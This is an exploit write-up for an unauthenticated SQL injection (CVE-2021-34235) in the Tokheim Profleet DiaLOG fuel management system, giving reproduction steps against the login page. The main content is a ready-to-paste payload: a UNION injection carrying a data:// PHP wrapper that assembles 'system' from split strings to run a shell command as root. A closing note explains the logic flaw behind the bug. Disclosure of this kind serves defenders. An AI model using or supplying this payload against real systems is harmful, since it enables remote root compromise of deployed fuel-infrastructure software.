# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated) # Date: 02/9/2022 # Exploit Author: golem445 # Vendor Homepage: https://www.tsg-solutions.com # Tested on: Kali Linux # CVE: CVE-2021-34235 # Description: Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root. ==Steps to Reproduce== # Go to : http://dialog_host/login.php # Enter escaped MySQL query into the username field and submit, passwords doesn't matter. (Such as: ' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -) # This can also be accomplished via intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter. ==Notes== This vulnerability appears rooted in a logic flaw. Typical authentication logic flow is a user submitting their credentials, authentication success/failure occurs, followed with results being noted in a log. This application appears to work inversely, i.e. logon attempt is logged, then the users credentials are checked.